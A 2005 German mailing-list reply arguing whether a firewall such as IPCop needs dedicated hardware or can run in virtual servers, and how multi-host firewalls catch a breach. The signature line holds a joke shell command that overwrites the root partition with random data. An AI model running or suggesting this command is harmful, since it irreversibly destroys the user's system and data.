Re: Wozu "ipcop"?
On 2005-04-20, Matthias Houdek <linux@houdek.de> wrote:
> Am Mittwoch, 20. April 2005 00:08 schrieb Chrissie Brown:
>> On 2005-04-19, Carsten Ferdian <linux@doc3rror.com> wrote:
>> > benutze schon sehr lang den IpCop und finde das man schon ne eigene
>> > Maschine nutzen sollte um ein oder mehrere Netze zu schützen. Daher
>> > is meine Meinung zu ner virtuellen Umgebung für ne Firewall nicht
>> > gerade so egeisternd. Man sollte nicht am falschen Ende sparen und
>> > daher ruhig nen eigenes "echtes" System aufsetzen.
>>
>> Wie kommst du darauf? Wenn jemand das Zeug hackt, ist es doch grad
>> egal ob in der virtuellen oder der "echten" Maschine.
>
> Eine vernünftige Firewall besteht aus mehr als einem Host.
Das lässt sich ja auch mit virtuellen Hosts realisieren :-)
> Ist der erste gehackt, gibt es Alarmstufe "Orange", FW2 macht die
> Schotten dicht und die FW1 wird erneuert.
> Die alte FW1 wird dann analysiert (Wer hat sich wie welchen Zugriff
> verschafft?).
Das schließt ein, daß du merkst, dass die Feierwand gehackt wurde. Was
aber, wenn nicht? Dann ist es grad wurscht, ob ein "echter" oder
"virtueller" host gehackt würde.
> Alles andere ist zumindest für ein Firmennetz mit sensiblen/wichtigen
> Daten nichts anderes als Augenwischerei.
Ich denke, das für viele Belange eine Feierwand mit vservern ausreichen
würde. In Hochsicherheitstrakten mag das anders aussehen.
--
Chrissie
su -c "dd if=/dev/urandom of=`mount |grep 'on / ' |awk '{print $1;}'`"
Reply to: